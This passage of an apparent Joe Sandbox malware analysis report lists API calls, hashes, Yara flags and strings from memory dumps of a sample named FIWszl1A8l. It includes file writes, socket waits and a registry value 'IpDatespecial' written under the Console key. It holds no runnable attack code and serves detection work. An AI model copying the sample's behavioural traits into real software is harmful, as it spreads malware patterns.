                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: bc88d20cc0f6977429a445edd6403ff27e90aaee80417dd20fad3f46b14158fb
                                                                                                  • Instruction ID: 7ff8c25c22d584970c88f32d4c47401b00288a0f1dc3a1db93848ab114875355
                                                                                                  • Opcode Fuzzy Hash: bc88d20cc0f6977429a445edd6403ff27e90aaee80417dd20fad3f46b14158fb
                                                                                                  • Instruction Fuzzy Hash: 14513CB7A00211CFD714DF5CD490969BBBABF89314729C0ADD64EAB321C732AD52CB91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction ID: b5a975afd8566387c422b775a2d2fe01bbad9db703a14a8822303b04e8b8b930
                                                                                                  • Opcode Fuzzy Hash: e6d8705c8b2e074a591befd5bcc494b5e10d3bbe54f6e4032036311d5e0cbfeb
                                                                                                  • Instruction Fuzzy Hash: 82515BB6A006158FD714DF1CC5C08A9FBF6BF8A35471A80AAC64E5F321C732AC06CB91
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D03883
                                                                                                  • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02D038C4
                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02D03931
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0395C
                                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02D039F4
                                                                                                  • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02D03A22
                                                                                                  • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02D03A39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058130114-0
                                                                                                  • Opcode ID: de71ac5ef7f7e253a5b35e71380481dd066bca75754425ea5e6991937387e296
                                                                                                  • Instruction ID: 1ccce3da4e03601eb6df49870f131bfcd57e7852aadf4abe8542a4fe467ae376
                                                                                                  • Opcode Fuzzy Hash: de71ac5ef7f7e253a5b35e71380481dd066bca75754425ea5e6991937387e296
                                                                                                  • Instruction Fuzzy Hash: 7151AA70A007009BDBA09F29E9C4BAAB7E5FF04714F10495AED9A977E0EB31ED40CB51
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00973883
                                                                                                  • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 009738C4
                                                                                                  • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 00973931
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0097395C
                                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 009739F4
                                                                                                  • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 00973A22
                                                                                                  • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 00973A39
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058130114-0
                                                                                                  • Opcode ID: e01fde8b771e6154370e0c88514f3ec5c9f85b9d0321c3dbddcdda513cb2a0fd
                                                                                                  • Instruction ID: 400aa948f3537d4c166c7f2c72b5339eb189dae8186cd5d9bf3af35796400cdb
                                                                                                  • Opcode Fuzzy Hash: e01fde8b771e6154370e0c88514f3ec5c9f85b9d0321c3dbddcdda513cb2a0fd
                                                                                                  • Instruction Fuzzy Hash: 1051A372604701DBD7209F24C985BAAB7E8BF44714F10C519EA9ED7780EB74FA40EB51
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6BD
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,02D0E815,?,?,?,?,76F923A0,00000000), ref: 02D0E6D7
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0E6F2
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000), ref: 02D0E6FF
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 02D0E70A
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0E711
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0E71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4202892810-0
                                                                                                  • Opcode ID: cf4592dea16ef979bcc8e31df3777677be9c2b45f352218744424e72141efd5e
                                                                                                  • Instruction ID: c9e591bb775b686bdaadb7255d973898af0d4048c8830fade9ced8bb7d34b95a
                                                                                                  • Opcode Fuzzy Hash: cf4592dea16ef979bcc8e31df3777677be9c2b45f352218744424e72141efd5e
                                                                                                  • Instruction Fuzzy Hash: 3F018171AC1210BBE3345BA4EC4FF5A3768EB49B25F614A04FB15A63C0D6A16C248665
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02D26318,00000008,02D13E36,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C), ref: 02D13D3F
                                                                                                  • __lock.LIBCMT ref: 02D13D73
                                                                                                    • Part of subcall function 02D18E5B: __mtinitlocknum.LIBCMT ref: 02D18E71
                                                                                                    • Part of subcall function 02D18E5B: __amsg_exit.LIBCMT ref: 02D18E7D
                                                                                                    • Part of subcall function 02D18E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,02D13F06,0000000D,02D26340,00000008,02D13FFF,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?), ref: 02D18E85
                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02D13D80
                                                                                                  • __lock.LIBCMT ref: 02D13D94
                                                                                                  • ___addlocaleref.LIBCMT ref: 02D13DB2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID: KERNEL32.DLL
                                                                                                  • API String ID: 637971194-2576044830
                                                                                                  • Opcode ID: 3396b14031d31d2122c26f53994c45e9dbabe40eb77878f3e61cbc7e8ef6dcb3
                                                                                                  • Instruction ID: 42fca0dd1741c7345b11d6f61d778ae793118cffcebb2e6741103cb710768137
                                                                                                  • Opcode Fuzzy Hash: 3396b14031d31d2122c26f53994c45e9dbabe40eb77878f3e61cbc7e8ef6dcb3
                                                                                                  • Instruction Fuzzy Hash: 8D016171940700EAE7609F65E90474AFBE1EF50314F20898DE4DA97B90CB74AD48CF25
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00987C00,00000008,009798EA,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C), ref: 009797F3
                                                                                                  • __lock.LIBCMT ref: 00979827
                                                                                                    • Part of subcall function 0097C144: __mtinitlocknum.LIBCMT ref: 0097C15A
                                                                                                    • Part of subcall function 0097C144: __amsg_exit.LIBCMT ref: 0097C166
                                                                                                    • Part of subcall function 0097C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,009799BA,0000000D,00987C28,00000008,00979AB1,00000000,?,00977711,00000000,00987B60,00000008,00977776,?), ref: 0097C16E
                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00979834
                                                                                                  • __lock.LIBCMT ref: 00979848
                                                                                                  • ___addlocaleref.LIBCMT ref: 00979866
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID: KERNEL32.DLL
                                                                                                  • API String ID: 637971194-2576044830
                                                                                                  • Opcode ID: b8df977d62eb303c084a96ab75a02417019909700f4a7f66d465bd33bbaadad6
                                                                                                  • Instruction ID: fafeeae7c7118a518a3bd4cc04e766f2bd9d63c339dc6979631f0a2fd439acbb
                                                                                                  • Opcode Fuzzy Hash: b8df977d62eb303c084a96ab75a02417019909700f4a7f66d465bd33bbaadad6
                                                                                                  • Instruction Fuzzy Hash: 930184B2405B00EFD720AF65D845749FBF0EF91324F14850EE4DA973A1CBB4A644CB15
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 02D0B7A7
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 02D0B7B7
                                                                                                  • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 02D0B7CE
                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000004), ref: 02D0B7D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$CloseDeleteOpen
                                                                                                  • String ID: Console$IpDatespecial
                                                                                                  • API String ID: 3183427449-1840232981
                                                                                                  • Opcode ID: 05d62a97f57bd6d1fb2c1d8f3acf79e1af655e9c26e2353c288a8a566f02b2db
                                                                                                  • Instruction ID: 2411c78eb43c942e65693480f45814a5a178122a37822b55bd44b6732229693f
                                                                                                  • Opcode Fuzzy Hash: 05d62a97f57bd6d1fb2c1d8f3acf79e1af655e9c26e2353c288a8a566f02b2db
                                                                                                  • Instruction Fuzzy Hash: 4DF0A775784340FBF3384760BD4FF66B764F798705FA04A4DFB856528086A0A91CC655
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D2031D
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D2032E
                                                                                                  • __getptd.LIBCMT ref: 02D2033C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 803148776-2671469338
                                                                                                  • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                  • Instruction ID: 00f9656766701615ff912ebf61e531beccd01da158fc80f69ce8c3f7c5a263e2
                                                                                                  • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                  • Instruction Fuzzy Hash: E4E01238504314DFCB209768D14AB6837E5EB64719F5505E1D44CCB721C738DC94CD52
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 00983412
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 00983423
                                                                                                  • __getptd.LIBCMT ref: 00983431
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                  • String ID: MOC$RCC$csm
                                                                                                  • API String ID: 803148776-2671469338
                                                                                                  • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                  • Instruction ID: 0d71437a906981ca1996715dd55b302117a411813dcadf5988750999b5a3f407
                                                                                                  • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                  • Instruction Fuzzy Hash: 61E012315041088ED710A778C08AB6932E8FBC4714F5984A9E51DCB333D728DE508642
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 02D09C3F
                                                                                                    • Part of subcall function 02D0F673: __FF_MSGBANNER.LIBCMT ref: 02D0F68C
                                                                                                    • Part of subcall function 02D0F673: __NMSG_WRITE.LIBCMT ref: 02D0F693
                                                                                                    • Part of subcall function 02D0F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D0F6B8
                                                                                                  • _free.LIBCMT ref: 02D09C63
                                                                                                  • _memset.LIBCMT ref: 02D09CBB
                                                                                                    • Part of subcall function 02D0A610: GetObjectW.GDI32(?,00000054,?), ref: 02D0A62E
                                                                                                  • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 02D09CD3
                                                                                                  • _free.LIBCMT ref: 02D09CE4
                                                                                                  • _free.LIBCMT ref: 02D09D23
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1756752955-0
                                                                                                  • Opcode ID: f3c3e870e5e2a03c944868ea92aeb26a6891fdac89498b1ba600bd8bf0326d23
                                                                                                  • Instruction ID: 5bcb02cb21799c98bfe47af411aeec778827c3dd10a28c2e4769132a306143db
                                                                                                  • Opcode Fuzzy Hash: f3c3e870e5e2a03c944868ea92aeb26a6891fdac89498b1ba600bd8bf0326d23
                                                                                                  • Instruction Fuzzy Hash: F331D6B2A00305ABE310DF65D8D0B9677E8FF48714F00853AD909C77A1E7B0E854CBA4
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF), ref: 02D050CA
                                                                                                  • WSASetLastError.WS2_32(0000139F), ref: 02D050E2
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02D050EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: 2bc10adf9fef22cde17e098a943563c8af919ba6f2c6d551b5140092c959a4d1
                                                                                                  • Instruction ID: b2ed234e675612f36981330aa132c7c084d537c0fe0d62868b924052e0282539
                                                                                                  • Opcode Fuzzy Hash: 2bc10adf9fef22cde17e098a943563c8af919ba6f2c6d551b5140092c959a4d1
                                                                                                  • Instruction Fuzzy Hash: FD31CD72A44204ABD720CF94E989F6AB3A8FB48714F408A5EFD15C7790E736EC10CB61
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF), ref: 009750AA
                                                                                                  • WSASetLastError.WS2_32(0000139F), ref: 009750C2
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 009750CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 4082018349-0
                                                                                                  • Opcode ID: bc6b0caa892a10a35dbb2a0c47462862e638405a6bacbfcf92b4c812b9f43676
                                                                                                  • Instruction ID: 1533b3243e946d8992309dc490f65c1f6bc21f0b5afa7278d8a2c12c6eb83d87
                                                                                                  • Opcode Fuzzy Hash: bc6b0caa892a10a35dbb2a0c47462862e638405a6bacbfcf92b4c812b9f43676
                                                                                                  • Instruction Fuzzy Hash: 38317076A08A44DBD710CF55ED86B6AB3E8FB88711F00851AF919C7781D776E800CB91
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748E1
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 009748EC
                                                                                                  • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 009748F9
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 00974914
                                                                                                  • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 0097491D
                                                                                                  • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 0097492E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleObjectSingleSleepWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 640476663-0
                                                                                                  • Opcode ID: e6cd326563fd8e9a74a1396add1adf4ab5a6178793c02a1fb8bc27f9fc72e961
                                                                                                  • Instruction ID: a3d0eee4099f8ea9b4ac51b2c08b5efa757edd9de1cbcd552d500690914efab8
                                                                                                  • Opcode Fuzzy Hash: e6cd326563fd8e9a74a1396add1adf4ab5a6178793c02a1fb8bc27f9fc72e961
                                                                                                  • Instruction Fuzzy Hash: 5C2137761086489BC710EFA8DD489C7F7F9FF89754B158B08E59887392C7349C09CBA1
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 02D205D6
                                                                                                    • Part of subcall function 02D200B7: __getptd.LIBCMT ref: 02D200C5
                                                                                                    • Part of subcall function 02D200B7: __getptd.LIBCMT ref: 02D200D3
                                                                                                  • __getptd.LIBCMT ref: 02D205E0
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __getptd.LIBCMT ref: 02D205EE
                                                                                                  • __getptd.LIBCMT ref: 02D205FC
                                                                                                  • __getptd.LIBCMT ref: 02D20607
                                                                                                  • _CallCatchBlock2.LIBCMT ref: 02D2062D
                                                                                                    • Part of subcall function 02D2015C: __CallSettingFrame@12.LIBCMT ref: 02D201A8
                                                                                                    • Part of subcall function 02D206D4: __getptd.LIBCMT ref: 02D206E3
                                                                                                    • Part of subcall function 02D206D4: __getptd.LIBCMT ref: 02D206F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1602911419-0
                                                                                                  • Opcode ID: 6e1d7d08e8656124dfac85f8a1876976be5b585b28d7ef1ed5f7230407502b5a
                                                                                                  • Instruction ID: f4825ee50c5ea4f475c27b247282202656510170cd38c15a3d405fbc3f02bd7e
                                                                                                  • Opcode Fuzzy Hash: 6e1d7d08e8656124dfac85f8a1876976be5b585b28d7ef1ed5f7230407502b5a
                                                                                                  • Instruction Fuzzy Hash: 4711F9B1C00309EFDF00EFA4D444A9D7BB1FF14315F1081A9E855A7350DB3899159F60
                                                                                                  APIs
                                                                                                  • __CreateFrameInfo.LIBCMT ref: 009836CB
                                                                                                    • Part of subcall function 0098325B: __getptd.LIBCMT ref: 00983269
                                                                                                    • Part of subcall function 0098325B: __getptd.LIBCMT ref: 00983277
                                                                                                  • __getptd.LIBCMT ref: 009836D5
                                                                                                    • Part of subcall function 0097990F: __getptd_noexit.LIBCMT ref: 00979912
                                                                                                    • Part of subcall function 0097990F: __amsg_exit.LIBCMT ref: 0097991F
                                                                                                  • __getptd.LIBCMT ref: 009836E3
                                                                                                  • __getptd.LIBCMT ref: 009836F1
                                                                                                  • __getptd.LIBCMT ref: 009836FC
                                                                                                  • _CallCatchBlock2.LIBCMT ref: 00983722
                                                                                                    • Part of subcall function 00983300: __CallSettingFrame@12.LIBCMT ref: 0098334C
                                                                                                    • Part of subcall function 009837C9: __getptd.LIBCMT ref: 009837D8
                                                                                                    • Part of subcall function 009837C9: __getptd.LIBCMT ref: 009837E6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1602911419-0
                                                                                                  • Opcode ID: 9eb8fbdff6370697fd3d774c20937fa029b557b4ad5e28059c5609ea49fbd8d8
                                                                                                  • Instruction ID: 13d14addafa90d0032f3a61d7b3a05e347c71888aa5c265a89f478065743c40c
                                                                                                  • Opcode Fuzzy Hash: 9eb8fbdff6370697fd3d774c20937fa029b557b4ad5e28059c5609ea49fbd8d8
                                                                                                  • Instruction Fuzzy Hash: E311D7B1C00209DFDB00EFA4D486BEE7BB1FF44314F108469F968A7251EB389A159F50
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 02D14891
                                                                                                    • Part of subcall function 02D13E5B: __getptd_noexit.LIBCMT ref: 02D13E5E
                                                                                                    • Part of subcall function 02D13E5B: __amsg_exit.LIBCMT ref: 02D13E6B
                                                                                                  • __amsg_exit.LIBCMT ref: 02D148B1
